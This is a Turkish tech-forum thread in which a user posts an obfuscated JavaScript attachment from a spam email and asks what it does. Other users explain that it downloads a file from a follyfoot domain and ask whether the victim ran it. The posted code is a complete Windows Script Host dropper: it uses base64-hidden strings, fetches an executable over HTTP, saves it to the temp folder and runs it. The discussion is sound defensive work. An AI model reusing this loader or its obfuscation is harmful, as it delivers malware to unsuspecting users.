Bu Kodun İşlevi Nedir?
-
var secretariat = 0;
castle = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
counting = [];
var vistula = {
':': '.',
'U': 'S',
'|': 'X'
};
for ( var i = 128; i--; ) {
if ( counting[ i ] === undefined )
counting[ i ] = -1;
counting[ castle.charCodeAt( i ) ] = i;
}
var enjoy = 6/6;
String.prototype.livestock = function () {
commemoration = this;
for (var i in vistula){commemoration = commemoration.replace(i, vistula[i]);}
return commemoration;
};
String.prototype.livestock4 = function() {
var c1, c2, c3, c4;
var i, len, out;
var str = this.split("children").join("");
len = str.length;
i = 0;
out = "";
while(i < len) {
/* c1 */
do {
c1 = counting[str.charCodeAt(i++) & 0xff];
} while(i < len && c1 == -1);
if(c1 == -1)
break;
/* c2 */
do {
c2 = counting[str.charCodeAt(i++) & 0xff];
} while(i < len && c2 == -1);
if(c2 == -1)
break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
/* c3 */
do {
c3 = str.charCodeAt(i++) & 0xff;
if(c3 == 61)
return out;
c3 = counting[c3];
} while(i < len && c3 == -1);
if(c3 == -1)
break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
/* c4 */
do {
c4 = str.charCodeAt(i++) & 0xff;
if(c4 == 61)
return out;
c4 = counting[c4];
} while(i < len && c4 == -1);
if(c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}
return out;
}
String.prototype.livestock2 = function () {
var painstaking = {
colossus: this
};
painstaking.zealand = painstaking.colossus["c3Vic3RyaW5n".livestock4()](secretariat, enjoy);
return painstaking.zealand;
};
var monte = "QWchildrenN0aXZchildrenlWE9iachildrenmVjdA=children=".livestock4();
var participant ="RXhwYW5childrenkRW52aXchildrenJvbm1lbnRTdHJchildrenpbmdz".livestock4();
var runaway ="JVchildrenRFTVchildrenAl".livestock4();
var inserting = [monte, participant,runaway, ""+"."+("editors","intoxicate","mechanics","webcast","inexpensive","tuneful","cloven","palisade","exe"), "R"+("abovementioned","shoemaker","revere","glutton","livesex","documents","monosyllable","existed","un"), ("M"+"SX"+"ML"+("weapons","called","quadrangle","aristocrat","extensive","schedule","maligned","2.")+"|M"+"LH"+"TT"+("benefits","atlantic","doors","prospective","prune","novel","boorish","squash","P>")+"WU"+("pillage","magnet","barrel","abigail","analyze","barely","registration","cr")+("andromeda","disco","questionnaire","importation","dilute","demure","photos","phoenix","ip")+"t:"+("seeker","redhot","lectures","fickle","industry","percent","aniline","languages","Sh")+"ell").livestock()];
crispin = "_F2_";
var occupations = this[inserting.shift()];
IetCwdDNFTS = "EowqFFWJXeU";
charming = (("discrepancy", "savings", "style", "wayne", "pywwyFPMpT") + "IhPtktQ").livestock2();
christine = (("publicity", "persistence", "librarian", "deformity", "swBsbWU") + "ivzwab").livestock2();
String.prototype.weakling = function (a) {
for (var b = [], c = 0; c < a.length; c++)b[c] = a[c];
return b.join("")
};
monte = "b3Blbg==".livestock4();;
var innovations = inserting.pop().split(">");
var military = new occupations(innovations[1]);
jReaGehPg = "_F3_";
var alleviate = new occupations(innovations[0]);
fuFozmvCR = "_F4_";
var affair = military[inserting.shift()](inserting.shift());
MFWAxq = "_F5_";
weasel = (("limits", "contiguity", "hospitals", "limitation", "EGsjwzBsxumR") + "ieXXojMLWGu").livestock2();
function roseate(remoteness, asylum) {
try {
var bracken = affair + "/" + asylum ;
bracken = bracken+ inserting.shift();
alleviate[monte](("tissue","manliness","G" + weasel) + ("fortytwo","bestsellers","attribute","scotland","T"), remoteness, false);
VBpQHieTii = "_F7_";
alleviate[christine + ("lawrence","loving","end")]();
var surpassing=(WScript+""=="V2luZG93cyBTY3JpcHQgSG9zdA==".livestock4())&&alleviate["c3RhdHVz".livestock4()] +""=="MjAw".livestock4()&&typeof(PHHAeLJvTKl)==="undefined";
lQHNgR = "_F8_";
if (surpassing) {
var publishers = new occupations((("defense","threatening","refurbished","meeting","solutions","evade","wiring","selling","A")+("warner","expired","concise","definition","urges","marvin","corral","courts","SEOO")+"DB"+("discharging","dragoon","infinitive","plains","pontiac","instructions","twice",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));
publishers[monte]();
AqBXlPg = "_F9_";
publishers.type = enjoy;
aWtzWmBOliX = "_F10_";
publishers["d3JpdGU=".livestock4()](alleviate[("peevish","saturn","creditor","articulated","admissible","rocket","morgan","")+"R"+"es"+"pon"+vistula['U'].toLowerCase()+"e"+"Qm9keQ==".livestock4()]);
ahhpGIHaml = "_F11_";
publishers[(charming + "o"+("possibility","desideratum","console","janus","service","surfaces","threesome","between","00")+("diversity","recognizable","distaff","sturgeon","tenure","schoolboy","grouping","8i")+"tion").replace("0"+("handling","valise","technological","abnormally","scribe","flippancy","highways","08"), christine)] = 0;
eKqNzfkRd = "_F12_";
publishers[("brakes","meddling","lombardy","reports","hearings","required","wireless","s")+"aveT"+"oF"+"ile"](bracken, 2);
nVRohD = "_F13_";
publishers.close();
jTjKLzksimq = "_F14_";
military[inserting.shift()](bracken, enjoy, true);
}
} catch (hfHNvpOFx) { };
JbqTIM = "_F15_";
}
roseate("aHR0cDovLw==".livestock4()+"\u0066\u006F\u006C\u006C\u0079\u0066\u006F\u006F\u0074\u002E"+"\u006F\u0072\u0067\u002F\u0065\u0072\u0067\u0035\u0034\u0067\u0034" + "?oazfPQs=Prkfvr","SpVVEiwXsWt");
kitRQx = "_F16_";
-
Nerede çalışıyor bu kod?
-
PcK0 bunu yazdı
Nerede çalışıyor bu kod?
Kendi mail adresime kendi mailim üzerinden gönderilen spam mail ekinde bulunan kod.
dosya.js uzantılı.
-
follyfoot [dot] org menşeili bir dosya indirmeye çalışıyor. Hiç olmassa kodun bir kısmındaki bulunan url bu dosyaya yönlendiriyor. http://bit.ly/1Ny7lD3 adresinde virüs total sonuçları var.
-
PcK0 bunu yazdı
follyfoot [dot] org menşeili bir dosya indirmeye çalışıyor. Hiç olmassa kodun bir kısmındaki bulunan url bu dosyaya yönlendiriyor. http://bit.ly/1Ny7lD3 adresinde virüs total sonuçları var.
Trend micro ve kasper herzamanki gibi uyumaya devam ediyor.
Combifix çalıştırdım, birşey çıkmadı.
Önerin varmıdır?
-
Hep up olsun hemde iki kelam edeyim.
Dosyayı incelemedim ki javascript kodunuda detaylı incelemedim. Tarayıcıyı delip geçen birşey olmayabilir. En azından güvenli bildiğimiz modern tarayıcılar olmak üzere diyelim. Hatta bir ara javascript kodunda WShell falan gördüm buda dosyanın masaüstünde çift tık ile çalışabileceğine delalet diyelim. Yani js dosyasını çift tık ile çalıştırmadıysan combofixte birşeyler çıkmaması normal olabilir. Çünkü sistemine bulaşmamış olabilir.
Velhasıl kelam .js dosyasını indirip çift tıkladın mı?
-
PcK0 bunu yazdı
Hep up olsun hemde iki kelam edeyim.
Dosyayı incelemedim ki javascript kodunuda detaylı incelemedim. Tarayıcıyı delip geçen birşey olmayabilir. En azından güvenli bildiğimiz modern tarayıcılar olmak üzere diyelim. Hatta bir ara javascript kodunda WShell falan gördüm buda dosyanın masaüstünde çift tık ile çalışabileceğine delalet diyelim. Yani js dosyasını çift tık ile çalıştırmadıysan combofixte birşeyler çıkmaması normal olabilir. Çünkü sistemine bulaşmamış olabilir.
Velhasıl kelam .js dosyasını indirip çift tıkladın mı?
JS dosyasına 2 kere tıklamadım. yani açma işlemi yapmadım.